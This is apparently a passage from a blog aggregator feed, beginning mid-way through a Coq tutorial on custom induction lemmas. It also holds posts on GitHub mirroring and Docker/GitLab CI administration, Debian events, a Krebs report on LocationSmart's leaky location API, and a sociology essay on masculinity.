      refine H4.
Defined. (* Important *)

Inside each case, we move all relevant hypotheses into the goal using revert and refine with the corresponding assumption, thus instantiating it. In the recursive case (Two), we assert that P holds for the subterms, by induction.

It is important to end this proofs with Defined, and not Qed, as we will see later.

In a next step, we can remove the sigma type:

Definition take_ind' a P := proj2_sig (take_ind_aux a P).

The type of take_ind' is as follows:

take_ind'
     : forall (a : Type) (P : nat -> Bag a -> Bag a -> Prop),
       proj1_sig (take_ind_aux a P) ->
       forall n b, P n b (take n b)

This looks almost like an induction lemma. The assumptions of this lemma have the not very helpful type proj1_sig (take_ind_aux a P), but we can already use this to prove length_take:

Theorem length_take:
  forall {a} n (b : Bag a),
  length (take n b) = min n (length b).
Proof.
  intros a.
  intros.
  apply take_ind' with (P := fun n b r => length r = min n (length b)).
  repeat apply conj; intros.
  * rewrite Nat.min_0_l. reflexivity.
  * rewrite Nat.min_0_r. reflexivity.
  * simpl. lia.
  * simpl. rewrite length_two, IHb1, IHb2. lia.
Qed.

In this case I have to explicitly state P where I invoke take_ind', because Coq cannot figure out this instantiation on its own (it requires higher-order unification, which is undecidable and unpredictable). In other cases I had more luck.

After I apply take_ind', I have this proof goal:

______________________________________(1/1)
proj1_sig (take_ind_aux a (fun n b r => length r = min n (length b)))

which is the type that Coq inferred for Hs above. We know that this is a conjunction of a bunch of assumptions, and we can split it as such, using repeat apply conj. At this point, Coq needs to look inside take_ind_aux; this would fail if we used Qed to conclude the proof of take_ind_aux.

This gives me four goals, one for each case of take, and the remaining proofs really only deals with the specifics of length_take – no more general dealing with worrying about getting the induction right and doing the case-splitting the right way.

Also note that, very conveniently, Coq uses the same name for the induction hypotheses IHb1 and IHb2 that we used in take_ind_aux!

Making it prettier

It may be a bit confusing to have this proj1_sig in the type, especially when working in a team where others will use your induction lemma without knowing its internals. But we can resolve that, and also turn the conjunctions into normal arrows, using a bit of tactic support. This is completely generic, so if you follow this procedure, you can just copy most of that:

Lemma uncurry_and: forall {A B C}, (A /\ B -> C) -> (A -> B -> C).
Proof. intros. intuition. Qed.
Lemma under_imp:   forall {A B C}, (B -> C) -> (A -> B) -> (A -> C).
Proof. intros. intuition. Qed.
Ltac iterate n f x := lazymatch n with
  | 0 => x
  | S ?n => iterate n f uconstr:(f x)
end.
Ltac uncurryN n x :=
  let n' := eval compute in n in
  lazymatch n' with
  | 0 => x
  | S ?n => let uc := iterate n uconstr:(under_imp) uconstr:(uncurry_and) in
            let x' := uncurryN n x in
            uconstr:(uc x')
end.

With this in place, we can define our final proof scheme lemma:

Definition take_ind'' a P
  := ltac:(let x := uncurryN 3 (proj2_sig (take_ind_aux a P)) in exact x).
Opaque take_ind''.

The type of take_ind'' is now exactly what we’d wish for: All assumptions spelled out, and the n =? 0 already taken of (compare this to the take_ind provided by the Function command above):

take_ind''
     : forall (a : Type) (P : nat -> Bag a -> Bag a -> Prop),
       (forall b : Bag a, P 0 b Empty) ->
       (forall n : nat, n <> 0 -> P n Empty Empty) ->
       (forall (x : a) (n : nat), n <> 0 -> P n (Unit x) (Unit x)) ->
       (forall (n : nat) (b1 b2 : Bag a),
        n <> 0 ->
        P n b1 (take n b1) ->
        P (n - length b1) b2 (take (n - length b1) b2) ->
        P n (Two b1 b2) (two (take n b1) (take (n - length b1) b2))) ->
       forall (n : nat) (b : Bag a), P n b (take n b)

At this point we can mark take_ind'' as Opaque, to hide how we obtained this lemma.

Our proof does not change a lot; we merely no longer have to use repeat apply conj:

Theorem length_take''':
  forall {a} n (b : Bag a),
  length (take n b) = min n (length b).
Proof.
  intros a.
  intros.
  apply take_ind'' with (P := fun n b r => length r = min n (length b)); intros.
  * rewrite Nat.min_0_l. reflexivity.
  * rewrite Nat.min_0_r. reflexivity.
  * simpl. lia.
  * simpl. rewrite length_two, IHb1, IHb2. lia.
Qed.

Is it worth it?

It was in my case: Applying this trick in our ongoing work of verifying parts of the Haskell compiler GHC separated a somewhat proof into a re-usable proof scheme (go_ind), making the actual proofs (go_all_WellScopedFloats, go_res_WellScoped) much neater and to the point. It saved “only” 60 lines (if I don’t count the 20 “generic” lines above), but the pay-off will increase as I do even more proofs about this function.

CryptogramMaliciously Changing Someone's Address

Someone changed the address of UPS corporate headquarters to his own apartment in Chicago. The company discovered it three months later.

The problem, of course, is that in the US there isn't any authentication of change-of-address submissions:

According to the Postal Service, nearly 37 million change-of-address requests ­ known as PS Form 3575 ­ were submitted in 2017. The form, which can be filled out in person or online, includes a warning below the signature line that "anyone submitting false or inaccurate information" could be subject to fines and imprisonment.

To cut down on possible fraud, post offices send a validation letter to both an old and new address when a change is filed. The letter includes a toll-free number to call to report anything suspicious.

Each year, only a tiny fraction of the requests are ever referred to postal inspectors for investigation. A spokeswoman for the U.S. Postal Inspection Service could not provide a specific number to the Tribune, but officials have previously said that the number of change-of-address investigations in a given year totals 1,000 or fewer typically.

While fraud involving change-of-address forms has long been linked to identity thieves, the targets are usually unsuspecting individuals, not massive corporations.

Worse Than FailureError'd: Perfectly Technical Difficulties

David G. wrote, "For once, I'm glad to see technical issues being presented in a technical way."

 

"Springer has a very interesting pricing algorithm for downloading their books: buy the whole book at some 10% of the sum of all its individual chapters," writes Bernie T.

 

"While browsing PlataGO! forums, I noticed the developers are erasing technical debt...and then some," Dariusz J. writes.

 

Bill K. wrote, "Hooray! It's an 'opposite sale' on Adidas' website!"

 

"A trail camera disguised at a salad bowl? Leave that at an all you can eat buffet and it'll blend right in," wrote Paul T.

 

Brian writes, "Amazon! That's not how you do math!"

 

[Advertisement] ProGet supports your applications, Docker containers, and third-party packages, allowing you to enforce quality standards across all components. Download and see how!

Planet DebianMartín Ferrari: MiniDebConf Hamburg - Thursday

MiniDebCamp Hamburg - Thursday 17/5

I missed my flight on Wednesday, and for a moment I thought I would have to cancel my attendance, but luckily I was able to buy a ticket for Thursday for a good price.

I arrived at the venue just in time for a "stand-up" meeting, where people introduced themselves and shared what are they working on / planning to work on. That gave me a great feeling, having an idea of what other people are doing, and gave me motivation to work on my projects.

The venue seems to be some kind of cooperative, with office space for different associations, there is also a small guest house (where I am sleeping), and a "cantina". The building seems very pretty, but is going through some renovations, so the scaffolding does not let you see it much. It also has a big outdoors area, which is always welcomed.

I had a good chat about mapping support in IkiWiki, so my rewrite of the OSM plugin might get some users even before it is completely merged!

I also worked for a while on Prometheus packages, I am hoping to finally get a new version of prometheus-alertmanager packaged soon.

I realised I still had some repos in my home directory in alioth, so I moved these away to salsa. On the same vein, I started discussions about migrating my data-collection scripts for contributors.d.o to salsa; this is quite important if we want to keep contributors being relevant and useful.

Comment

Planet DebianOlivier Berger: Virtualized lab demonstration using a tweaked Labtainers running in a container

I’ve recorded a screencast: Labtainers in docker demonstration (embedded below) demonstrating how I’ve tweaked Labtainers so as to run it inside its own Docker container.

I’m currently very much excited by the Labtainers framework for delivering virtual labs, for instance in the context of MOOCs.

Labtainers is quite interesting as it allows isolating a lab in several containers running in their own dedicated virtual network, which helps distributing a lab without needing to install anything locally.

My tweak allows to run what I called the “master” container which contains the labtainers scripts, instead of having to install labtainers on a Linux host. This should help installation and distribution of labtainers, as well as deploying it on cloud platforms, some day soon. In the meantime Labtainer containers of the labs run with privileges so it’s advised to be careful, and running the whole of these containers in a VM may be safer. Maybe Labtainers will evolve in the future to integrate a containerization of its scripts. My patches are pending, but the upstream authors are currently focused on some other priorities.

Another interesting property of labtainers that is shown in the demo is the auto-grading feature that uses traces of what was performed inside the lab environment by the student, to evaluate the activities. Here, the telnetlab that I’ve shown, is evaluated by looking at text input on the command line or messages appearing on the stdout or in logs : the student launched both telnet or ssh, some failed login appeared, etc.

However, the demo is a bit confusing, in that I recorded a second lab execution whereas I had previously attempted a first try at the same telnetlab. In labtainers, traces of execution can accumulate : the student wil make a first attempt, and restart later, before sending it all to the professor (unless a redo.py is issued). This explanes that the  grading appears to give a different result than what I performed in the screencast.

Stay tuned for more news about my Labtainers adventures.

P.S. thanks to labtainers authors, and obs-studio folks for the screencast recording tool 🙂

Planet DebianLouis-Philippe Véronneau: Running systemd in the Gitlab docker runner CI

At the DebConf videoteam, we use ansible to manage our machines. Last fall in Cambridge, we migrated our repositories on salsa.debian.org and I started playing with the Gitlab CI. It's pretty powerful and helped us catch a bunch of errors we had missed.

As it was my first time playing with continuous integration and docker, I had trouble when our playbooks used systemd in a way or another and I couldn't figure out a way to have systemd run in the Gitlab docker runner.

Fast forward a few months and I lost another day and a half working on this issue. I haven't been able to make it work (my conclusion is that it's not currently possible), but I thought I would share what I learned in the process with others. Who knows, maybe someone will have a solution!

10 steps to failure

I first stated by creating a privileged Gitlab docker runner on a machine that is dedicated to running Gitlab CI runners. To run systemd in docker you either need to run privileged docker instances or to run them with the --add-cap=SYS_ADMIN permission.

If you were trying to run a docker container that runs with systemd directly, you would do something like:

$ docker run -it --cap-add SYS_ADMIN -v /sys/fs/cgroup:/sys/fs/cgroup:ro debian-systemd

I tried replicating this behavior with the Gitlab runner by mounting the right volumes in the runner and giving it the right cap permissions.

The thing is, normally your docker container runs a entrypoint command such as CMD ["/lib/systemd/systemd"]. To run its CI scripts, the Gitlab runner takes that container but replaces the entrypoint command by:

sh -c 'if [ -x /usr/local/bin/bash ]; then\n\texec /usr/local/bin/bash \nelif [ -x /usr/bin/bash ]; then\n\texec /usr/bin/bash \nelif [ -x /bin/bash ]; then\n\texec /bin/bash \nelif [ -x /usr/local/bin/sh ]; then\n\texec /usr/local/bin/sh \nelif [ -x /usr/bin/sh ]; then\n\texec /usr/bin/sh \nelif [ -x /bin/sh ]; then\n\texec /bin/sh \nelse\n\techo shell not found\n\texit 1\nfi\n\n'

That is to say, it tries to run bash.

If you try to run commands that require systemd such as systemctl status, you'll end up with this error message since systemd is not running:

Failed to get D-Bus connection: Operation not permitted

Trying to run systemd manually once the container has been started won't work either, since systemd needs to be PID 1 in order to work (and PID 1 is bash). You end up with this error:

Trying to run as user instance, but the system has not been booted with systemd.

At this point, I came up with a bunch of creative solutions to try to bypass Gitlab's entrypoint takeover. Turns out you can tell the Gitlab runner to override the container's entrypoint with your own. Sadly, the runner then appends its long bash command right after.

For example, if you run a job with this gitlab-ci entry:

image:
  name: debian-systemd
  entrypoint: "/lib/systemd/systemd"
script:
- /usr/local/bin/my-super-script

You will get this entrypoint:

/lib/systemd/systemd sh -c 'if [ -x /usr/local/bin/bash ]; then\n\texec /usr/local/bin/bash \nelif [ -x /usr/bin/bash ]; then\n\texec /usr/bin/bash \nelif [ -x /bin/bash ]; then\n\texec /bin/bash \nelif [ -x /usr/local/bin/sh ]; then\n\texec /usr/local/bin/sh \nelif [ -x /usr/bin/sh ]; then\n\texec /usr/bin/sh \nelif [ -x /bin/sh ]; then\n\texec /bin/sh \nelse\n\techo shell not found\n\texit 1\nfi\n\n'

This obviously fails. I then tried to be clever and use this entrypoint: ["/lib/systemd/systemd", "&&"]. This does not work either, since docker requires the entrypoint to be only one command.

Someone pointed out to me that you could try to use exec /lib/systemd/systemd to PID 1 bash by systemd, but that also fails with an error telling you the system has not been booted with systemd.

One more level down

Since it seems you can't run systemd in the Gitlab docker runner directly, why not try to run systemd in docker in docker (dind)? dind is used quite a lot in the Gitlab CI to build containers, so we thought it might work.

Sadly, we haven't been able to make this work either. You need to mount volumes in docker to run systemd properly and it seems docker doesn't like to mount volumes from a docker container that already have been mounted from the docker host... Ouf.

If you have been able to run systemd in the Gitlab docker runner, please contact me!

Paths to explore

The only Gitlab runner executor I've used at the moment is the docker one, since it's what most Gitlab instances run. I have no experience with it, but since there is also an LXC executor, it might be possible to run Gitlab CI tests with systemd this way.

Planet DebianLouis-Philippe Véronneau: Join us in Hamburg for the Hamburg Mini-DebConf!

Thanks to Debian, I have the chance to be able to attend the Hamburg Mini-DebConf, taking place in Hamburg from May 16th to May 20th. We are hosted by Dock Europe in the amazing Viktoria Kaserne building.

Viktoria Kaserne

As always, the DebConf videoteam has been hard at work! Our setup is working pretty well and we only have minor fixes to implement before the conference starts.

For those of you who couldn't attend the mini-conf, you can watch the live stream here. Videos will be uploaded shortly after to the DebConf video archive.

Olasd resting on our makeshift cubes podium

Planet Linux AustraliaMichael Still: How to maintain a local mirror of github repositories

Share

Similarly to yesterday’s post about mirroring ONAP’s git, I also want to mirror all of the git repositories for certain github projects. In this specific case, all of the Kubernetes repositories.

So once again, here is a script based on something Tony Breeds and I cooked up a long time ago for OpenStack…

#!/usr/bin/env

from __future__ import print_function

import datetime
import json
import os
import subprocess
import random
import requests

from github import Github as github


GITHUB_ACCESS_TOKEN = '...use yours!...'


def get_github_projects():
    g = github(GITHUB_ACCESS_TOKEN)
    for user in ['kubernetes']:
        for repo in g.get_user(login=user).get_repos():
            yield('https://github.com', repo.full_name)


def _ensure_path(path):
    if not path:
        return

    full = []
    for elem in path.split('/'):
        full.append(elem)
        if not os.path.exists('/'.join(full)):
            os.makedirs('/'.join(full))


starting_dir = os.getcwd()
projects = []
for res in list(get_github_projects()):
    if len(res) == 3:
        projects.append(res)
    else:
        projects.append((res[0], res[1], res[1]))
    
random.shuffle(projects)

for base_url, project, subdir in projects:
    print('%s Considering %s %s'
          %(datetime.datetime.now(), base_url, project))
    os.chdir(starting_dir)

    if os.path.isdir(subdir):
        os.chdir(subdir)

        print('%s Updating %s'
              %(datetime.datetime.now(), project))
        try:
            subprocess.check_call(
                ['git', 'remote', '-vvv', 'update'])
        except Exception as e:
            print('%s FAILED: %s'
                  %(datetime.datetime.now(), e))
    else:
        git_url = os.path.join(base_url, project)
        _ensure_path('/'.join(subdir.split('/')[:-1]))

        print('%s Cloning %s'
              %(datetime.datetime.now(), project))
        subprocess.check_call(
            ['ionice', '-c', 'idle', 'git', 'clone',
             '-vvv', '--mirror', git_url, subdir])

This script is basically the same as the ONAP one, but it understands how to get a project list from github and doesn’t need to handle ONAP’s slightly strange repository naming scheme.

I hope it is useful to someone other than me.

Share

The post How to maintain a local mirror of github repositories appeared first on Made by Mikal.

Planet DebianNorbert Preining: Docker, cron, environment variables, and Kubernetes

I recently mentioned that I am running cron in some of the docker containers I need for a new service. Now that we moved to Kubernetes and Rancher for deployment, I moved most of the configuration into Kubernetes ConfigMaps, and expose the key/value pairs their as environment variables. Sounded like a good idea, but …

but well, reading the documentation would have helped. Cron scripts do not see the normal environment of the surrounding process (cron, init, whatever), but get a cleaned up environment. As a consequence, none of the configuration keys available in the environment did show up in the cron jobs – and as a consequence they badly failed of course 😉

After some thinking and reading, I came up with two solutions, one “Dirty Harry^WNorby” solution and one clean and nice, but annoying solution.

Dirty Harry^WNorby solution

What is available in the environment of the cron jobs is minimal, and in fact more or less what is defined in /etc/environment and stuff set by the shell (if it is a shell script). So the solution was adding the necessary variable definitions to /etc/environment in a way that they are properly set. For that, I added the following code in the start-syslog-cron script that is the entry point of the container:

# prepare for export of variables to cron jobs
if [ -r /env-vars-to-be-exported ]
then
  for i in `cat /env-vars-to-be-exported`
  do
    echo "$i=${!i}" >> /etc/environment
  done
fi

Meaning, if the container contains a file /env-vars-to-be-exported then the lines of it are considered variable names and are set in the environment with the respective values at the time of invocation.

Using this quick and dirty trick it is now dead-easy to get the ConfigMap variables into the cron job’s environment by adding the necessary variables names to the file /env-vars-to-be-exported. Thus, no adaption of the original source code was necessary – a big plus!

Be warned, there is no error checking etc, so one can mess up the container quite easily 😉

Standards solution

The more standard and clean solution is mounting the ConfigMap and reading the values from the exported files. This is possible, has the big advantage that one can change the values without restarting the containers (mounted ConfigMaps are updated when the ConfigMaps are changed – besides a few corner cases), and no nasty trickery in the initialization.

Disadvantage is that the code of the cron jobs needs to be changed to read the variables from the config files instead of the environment.

,

Krebs on SecurityTracking Firm LocationSmart Leaked Location Data for Customers of All Major U.S. Mobile Carriers Without Consent in Real Time Via Its Web Site

LocationSmart, a U.S. based company that acts as an aggregator of real-time data about the precise location of mobile phone devices, has been leaking this information to anyone via a buggy component of its Web site — without the need for any password or other form of authentication or authorization — KrebsOnSecurity has learned. The company took the vulnerable service offline early this afternoon after being contacted by KrebsOnSecurity, which verified that it could be used to reveal the location of any AT&T, Sprint, T-Mobile or Verizon phone in the United States to an accuracy of within a few hundred yards.

On May 10, The New York Times broke the news that a different cell phone location tracking company called Securus Technologies had been selling or giving away location data on customers of virtually any major mobile network provider to a sheriff’s office in Mississippi County, Mo.

On May 15, ZDnet.com ran a piece saying that Securus was getting its data through an intermediary — Carlsbad, CA-based LocationSmart.

Wednesday afternoon Motherboard published another bombshell: A hacker had broken into the servers of Securus and stolen 2,800 usernames, email addresses, phone numbers and hashed passwords of authorized Securus users. Most of the stolen credentials reportedly belonged to law enforcement officers across the country — stretching from 2011 up to this year.

Several hours before the Motherboard story went live, KrebsOnSecurity heard from Robert Xiao, a security researcher at Carnegie Mellon University who’d read the coverage of Securus and LocationSmart and had been poking around a demo tool that LocationSmart makes available on its Web site for potential customers to try out its mobile location technology.

LocationSmart’s demo is a free service that allows anyone to see the approximate location of their own mobile phone, just by entering their name, email address and phone number into a form on the site. LocationSmart then texts the phone number supplied by the user and requests permission to ping that device’s nearest cellular network tower.

Once that consent is obtained, LocationSmart texts the subscriber their approximate longitude and latitude, plotting the coordinates on a Google Street View map. [It also potentially collects and stores a great deal of technical data about your mobile device. For example, according to their privacy policy that information “may include, but is not limited to, device latitude/longitude, accuracy, heading, speed, and altitude, cell tower, Wi-Fi access point, or IP address information”].

But according to Xiao, a PhD candidate at CMU’s Human-Computer Interaction Institute, this same service failed to perform basic checks to prevent anonymous and unauthorized queries. Translation: Anyone with a modicum of knowledge about how Web sites work could abuse the LocationSmart demo site to figure out how to conduct mobile number location lookups at will, all without ever having to supply a password or other credentials.

“I stumbled upon this almost by accident, and it wasn’t terribly hard to do,” Xiao said. “This is something anyone could discover with minimal effort. And the gist of it is I can track most peoples’ cell phone without their consent.”

Xiao said his tests showed he could reliably query LocationSmart’s service to ping the cell phone tower closest to a subscriber’s mobile device. Xiao said he checked the mobile number of a friend several times over a few minutes while that friend was moving. By pinging the friend’s mobile network multiple times over several minutes, he was then able to plug the coordinates into Google Maps and track the friend’s directional movement.

“This is really creepy stuff,” Xiao said, adding that he’d also successfully tested the vulnerable service against one Telus Mobility mobile customer in Canada who volunteered to be found.

Before LocationSmart’s demo was taken offline today, KrebsOnSecurity pinged five different trusted sources, all of whom gave consent to have Xiao determine the whereabouts of their cell phones. Xiao was able to determine within a few seconds of querying the public LocationSmart service the near-exact location of the mobile phone belonging to all five of my sources.

LocationSmart’s demo page.

One of those sources said the longitude and latitude returned by Xiao’s queries came within 100 yards of their then-current location. Another source said the location found by the researcher was 1.5 miles away from his current location. The remaining three sources said the location returned for their phones was between approximately 1/5 to 1/3 of a mile at the time.

Reached for comment via phone, LocationSmart Founder and CEO Mario Proietti said the company was investigating.

“We don’t give away data,” Proietti said. “We make it available for legitimate and authorized purposes. It’s based on legitimate and authorized use of location data that only takes place on consent. We take privacy seriously and we’ll review all facts and look into them.”

LocationSmart’s home page features the corporate logos of all four the major wireless providers, as well as companies like Google, Neustar, ThreatMetrix, and U.S. Cellular. The company says its technologies help businesses keep track of remote employees and corporate assets, and that it helps mobile advertisers and marketers serve consumers with “geo-relevant promotions.”

LocationSmart’s home page lists many partners.

It’s not clear exactly how long LocationSmart has offered its demo service or for how long the service has been so permissive; this link from archive.org suggests it dates back to at least January 2017. This link from The Internet Archive suggests the service may have existed under a different company name — loc-aid.com — since mid-2011, but it’s unclear if that service used the same code. Loc-aid.com is one of four other sites hosted on the same server as locationsmart.com, according to Domaintools.com.

LocationSmart’s privacy policy says the company has security measures in place…”to protect our site from the loss or misuse of information that we have collected. Our servers are protected by firewalls and are physically located in secure data facilities to further increase security. While no computer is 100% safe from outside attacks, we believe that the steps we have taken to protect your personal information drastically reduce the likelihood of security problems to a level appropriate to the type of information involved.”

But these assurances may ring hollow to anyone with a cell phone who’s concerned about having their physical location revealed at any time. The component of LocationSmart’s Web site that can be abused to look up mobile location data at will is an insecure “application programming interface” or API — an interactive feature designed to display data in response to specific queries by Web site visitors.

Although the LocationSmart’s demo page required users to consent to having their phone located by the service, LocationSmart apparently did nothing to prevent or authenticate direct interaction with the API itself.

API authentication weaknesses are not uncommon, but they can lead to the exposure of sensitive data on a great many people in a short period of time. In April 2018, KrebsOnSecurity broke the story of an API at the Web site of fast-casual bakery chain PaneraBread.com that exposed the names, email and physical addresses, birthdays and last four digits of credit cards on file for tens of millions of customers who’d signed up for an account at PaneraBread to order food online.

In a May 9 letter sent to the top four wireless carriers and to the U.S. Federal Communications Commission in the wake of revelations about Securus’ alleged practices, Sen. Ron Wyden (D-Ore.) urged all parties to take “proactive steps to prevent the unrestricted disclosure and potential abuse of private customer data.”

“Securus informed my office that it purchases real-time location information on AT&T’s customers — through a third party location aggregator that has a commercial relationship with the major wireless carriers — and routinely shares that information with its government clients,” Wyden wrote. “This practice skirts wireless carrier’s legal obligation to be the sole conduit by which the government may conduct surveillance of Americans’ phone records, and needlessly exposes millions of Americans to potential abuse and unchecked surveillance by the government.”

Securus, which reportedly gets its cell phone location data from LocationSmart, told The New York Times that it requires customers to upload a legal document — such as a warrant or affidavit — and to certify that the activity was authorized. But in his letter, Wyden said “senior officials from Securus have confirmed to my office that it never checks the legitimacy of those uploaded documents to determine whether they are in fact court orders and has dismissed suggestions that it is obligated to do so.”

Securus did not respond to requests for comment.

THE CARRIERS RESPOND

It remains unclear what, if anything, AT&T, Sprint, T-Mobile and Verizon plan to do about any of this. A third-party firm leaking customer location information not only would almost certainly violate each mobile providers own stated privacy policies, but the real-time exposure of this data poses serious privacy and security risks for virtually all U.S. mobile customers (and perhaps beyond, although all my willing subjects were inside the United States).

None of the major carriers would confirm or deny a formal business relationship with LocationSmart, despite LocationSmart listing them each by corporate logo on its Web site.

AT&T spokesperson Jim Greer said AT&T does not permit the sharing of location information without customer consent or a demand from law enforcement.

“If we learn that a vendor does not adhere to our policy we will take appropriate action,” Greer said.

T-Mobile referred me to their privacy policy, which says T-Mobile follows the “best practices” document (PDF) for subscriber location data as laid out by the CTIA, the international association for the wireless telecommunications industry.

A T-Mobile spokesperson said that after receiving Sen. Wyden’s letter, the company quickly shut down any transaction of customer location data to Securus and LocationSmart.

“We take the privacy and security of our customers’ data very seriously,” the company said in a written statement. “We have addressed issues that were identified with Securus and LocationSmart to ensure that such issues were resolved and our customers’ information is protected. We continue to investigate this.”

Verizon also referred me to their privacy policy.

Sprint officials shared the following statement:

“Protecting our customers’ privacy and security is a top priority, and we are transparent about our Privacy Policy. To be clear, we do not share or sell consumers’ sensitive information to third parties. We share personally identifiable geo-location information only with customer consent or in response to a lawful request such as a validated court order from law enforcement.”

“We will answer the questions raised in Sen. Wyden’s letter directly through appropriate channels. However, it is important to note that Sprint’s relationship with Securus does not include data sharing, and is limited to supporting efforts to curb unlawful use of contraband cellphones in correctional facilities.”

WHAT NOW?

Stephanie Lacambra, a staff attorney with the the nonprofit Electronic Frontier Foundation, said that wireless customers in the United States cannot opt out of location tracking by their own mobile providers. For starters, carriers constantly use this information to provide more reliable service to the customers. Also, by law wireless companies need to be able to ascertain at any time the approximate location of a customer’s phone in order to comply with emergency 911 regulations.

But unless and until Congress and federal regulators make it more clear how and whether customer location information can be shared with third-parties, mobile device customers may continue to have their location information potentially exposed by a host of third-party companies, Lacambra said.

“This is precisely why we have lobbied so hard for robust privacy protections for location information,” she said. “It really should be only that law enforcement is required to get a warrant for this stuff, and that’s the rule we’ve been trying to push for.”

Chris Calabrese is vice president of the Center for Democracy & Technology, a policy think tank in Washington, D.C. Calabrese said the current rules about mobile subscriber location information are governed by the Electronic Communications Privacy Act (ECPA), a law passed in 1986 that hasn’t been substantially updated since.

“The law here is really out of date,” Calabrese said. “But I think any processes that involve going to third parties who don’t verify that it’s a lawful or law enforcement request — and that don’t make sure the evidence behind that request is legitimate — are hugely problematic and they’re major privacy violations.”

“I would be very surprised if any mobile carrier doesn’t think location information should be treated sensitively, and I’m sure none of them want this information to be made public,” Calabrese continued. “My guess is the carriers are going to come down hard on this, because it’s sort of their worst nightmare come true. We all know that cell phones are portable tracking devices. There’s a sort of an implicit deal where we’re okay with it because we get lots of benefits from it, but we all also assume this information should be protected. But when it isn’t, that presents a major problem and I think these examples would be a spur for some sort of legislative intervention if they weren’t fixed very quickly.”

For his part, Xiao says we’re likely to see more leaks from location tracking companies like Securus and LocationSmart as long as the mobile carriers are providing third party companies any access to customer location information.

“We’re going to continue to see breaches like this happen until access to this data can be much more tightly controlled,” he said.

Sen. Wyden issued a statement on Friday in response to this story:

“This leak, coming only days after the lax security at Securus was exposed, demonstrates how little companies throughout the wireless ecosystem value Americans’ security. It represents a clear and present danger, not just to privacy but to the financial and personal security of every American family. Because they value profits above the privacy and safety of the Americans whose locations they traffic in, the wireless carriers and LocationSmart appear to have allowed nearly any hacker with a basic knowledge of websites to track the location of any American with a cell phone.”

“The threats to Americans’ security are grave – a hacker could have used this site to know when you were in your house so they would know when to rob it. A predator could have tracked your child’s cell phone to know when they were alone. The dangers from LocationSmart and other companies are limitless. If the FCC refuses to act after this revelation then future crimes against Americans will be the commissioners’ heads.”

 

Sen. Mark Warner (D-Va.) also issued a statement:

“This is one of many developments over the last year indicating that consumers are really in the dark on how their data is being collected and used,” Sen. Warner said. “It’s more evidence that we need 21st century rules that put users in the driver’s seat when it comes to the ways their data is used.”

In a statement provided to KrebsOnSecurity on Friday, LocationSmart said:

“LocationSmart provides an enterprise mobility platform that strives to bring secure operational efficiencies to enterprise customers. All disclosure of location data through LocationSmart’s platform relies on consent first being received from the individual subscriber. The vulnerability of the consent mechanism recently identified by Mr. Robert Xiao, a cybersecurity researcher, on our online demo has been resolved and the demo has been disabled. We have further confirmed that the vulnerability was not exploited prior to May 16th and did not result in any customer information being obtained without their permission.”

“On that day as many as two dozen subscribers were located by Mr. Xiao through his exploitation of the vulnerability. Based on Mr. Xiao’s public statements, we understand that those subscribers were located only after Mr. Xiao personally obtained their consent. LocationSmart is continuing its efforts to verify that not a single subscriber’s location was accessed without their consent and that no other vulnerabilities exist. LocationSmart is committed to continuous improvement of its information privacy and security measures and is incorporating what it has learned from this incident into that process.”

It’s not clear who LocationSmart considers “customers” in the phrase, “did not result in any customer information being obtained without their permission,” since anyone whose location was looked up through abuse of the service’s buggy API could not fairly be considered a “customer.”

Update, May 18, 11:31 AM ET: Added comments from Sens. Wyden and Warner, as well as updated statements from LocationSmart and T-Mobile.

Sociological Images“I Felt Like Destroying Something Beautiful”

When I was eight, my brother and I built a card house. He was obsessed with collecting baseball cards and had amassed thousands, taking up nearly every available corner of his childhood bedroom. After watching a particularly gripping episode of The Brady Bunch, in which Marsha and Greg settled a dispute by building a card house, we decided to stack the cards in our favor and build. Forty-eight hours later a seven-foot monstrosity emerged…and it was glorious.

I told this story to a group of friends as I ran a stack of paper coasters through my fingers. We were attending Oktoberfest 2017 in a rural university town in the Midwest. They collectively decided I should flex my childhood skills and construct a coaster card house. Supplies were in abundance and time was no constraint. 

I began to construct. Four levels in, people around us began to take notice; a few snapped pictures. Six levels in, people began to stop, actively take pictures, and inquire as to my progress and motivation. Eight stories in, a small crowd emerged. Everyone remained cordial and polite. At this point it became clear that I was too short to continue building. In solidarity, one of my friends stood on a chair to encourage the build. We built the last three levels together, atop chairs, in the middle of the convention center. 

Where inquires had been friendly in the early stages of building, the mood soon turned. The moment chairs were used to facilitate the building process was the moment nearly everyone in attendance began to take notice. As the final tier went up, objects began flying at my head. Although women remained cordial throughout, a fraction of the men in the crowd began to become more and more aggressive. Whispers of  “I bet you $50 that you can’t knock it down” or “I’ll give you $20 if you go knock it down” were heard throughout.  A man chatted with my husband, criticizing the structural integrity of the house and offering insight as to how his house would be better…if he were the one building. Finally, a group of very aggressive men began circling like vultures. One man chucked empty plastic cups from a few tables away. The card house was complete for a total of 2-minutes before it fell. The life of the tower ended as such: 

Man: “Would you be mad if someone knocked it down?”

Me: “I’m the one who built it so I’m the one who gets to knock it down.”

Man: “What? You’re going to knock it down?”

The man proceeded to punch the right side of the structure; a quarter of the house fell. Before he could strike again, I stretched out my arms knocking down the remainder. A small curtsey followed, as if to say thank you for watching my performance. There was a mixture of cheers and boos. Cheers, I imagine from those who sat in nearby tables watching my progress throughout the night. Boos, I imagine, from those who were denied the pleasure of knocking down the structure themselves.

As an academic it is difficult to remove my everyday experiences from research analysis.  Likewise, as a gender scholar the aggression displayed by these men was particularly alarming. In an era of #metoo, we often speak of toxic masculinity as enacting masculine expectations through dominance, and even violence. We see men in power, typically white men, abuse this very power to justify sexual advances and sexual assault. We even see men justify mass shootings and attacks based on their perceived subordination and the denial of their patriarchal rights.

Yet toxic masculinity also exits on a smaller scale, in their everyday social worlds. Hegemonic masculinity is a more apt description for this destructive behavior, rather than outright violent behavior, as hegemonic masculinity describes a system of cultural meanings that gives men power — it is embedded in everything from religious doctrines, to wage structures, to mass media. As men learn hegemonic expectations by way of popular culture—from Humphrey Bogart to John Wayne—one cannot help but think of the famous line from the hyper-masculine Fight Club (1999), “I just wanted to destroy something beautiful.”

Power over women through hegemonic masculinity may best explain the actions of the men at Ocktoberfest. Alcohol consumption at the event allowed men greater freedom to justify their destructive behavior. Daring one another to physically remove a product of female labor, and their surprise at a woman’s choice to knock the tower down herself, are both in line with this type of power over women through the destruction of something “beautiful”.

Physical violence is not always a key feature of hegemonic masculinity (Connell 1987: 184). When we view toxic masculinity on a smaller scale, away from mass shootings and other high-profile tragedies, we find a form of masculinity that embraces aggression and destruction in our everyday social worlds, but is often excused as being innocent or unworthy of discussion.

Sandra Loughrin is an Assistant Professor at the University of Nebraska at Kearney. Her research areas include gender, sexuality, race, and age.

(View original at https://thesocietypages.org/socimages)

Cory DoctorowTalking education and technology with the Future Trends Forum

“Science fiction writer and cyberactivist Cory Doctorow joined the Future Trends Forum to explore possibilities for technology and education.”

